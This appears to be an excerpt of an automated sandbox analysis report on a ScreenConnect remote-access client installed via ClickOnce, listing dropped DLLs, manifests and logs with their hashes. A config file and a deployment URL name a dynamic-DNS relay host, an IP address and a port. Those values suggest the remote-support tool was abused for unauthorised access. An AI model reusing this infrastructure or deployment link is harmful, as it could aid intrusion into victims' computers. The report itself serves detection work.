                                                                                                                                                                                                                                                      MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                      SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                      SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                      SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1373
                                                                                                                                                                                                                                                      Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                      MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                      SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                      SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                      SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):1662
                                                                                                                                                                                                                                                      Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                      MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                      SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                      SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                      SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):847
                                                                                                                                                                                                                                                      Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (621), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14986
                                                                                                                                                                                                                                                      Entropy (8bit):3.817834412062261
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:t6BKasdrv5yInMSiY1bBBaOy0lmsdrv5yInMSiY8NYG/5DD8vkBusdrv5yInMSii:D5y8V1baU5y8VkDp5y8VoJLEv
                                                                                                                                                                                                                                                      MD5:51900B3FB677902E17F0D3CE987937C5
                                                                                                                                                                                                                                                      SHA1:8519D5B4C39B4873FC8EB63EBD43DB6A91D085C4
                                                                                                                                                                                                                                                      SHA-256:D5E4E026098CC7A35B25E331B2CDDA3041A979902CE9B11ECCB2F81E4A040D1E
                                                                                                                                                                                                                                                      SHA-512:CCBEC483999A800AC7EA2AC00BA6AB7E45B6558CDF3220BEFBFE69FB48F14E8173DFF604B597384AAA0CA260E7BFBE118A831C0EBA0C3175C9D9FA3E19B79DD1
                                                                                                                                                                                                                                                      Malicious:false
Preview:
PLATFORM VERSION INFO
  Windows : 10.0.19045.0 (Win32NT)
  Common Language Runtime : 4.0.30319.42000
  System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C
  clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C
  dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C
  dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)
SOURCES
  Deployment url : https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
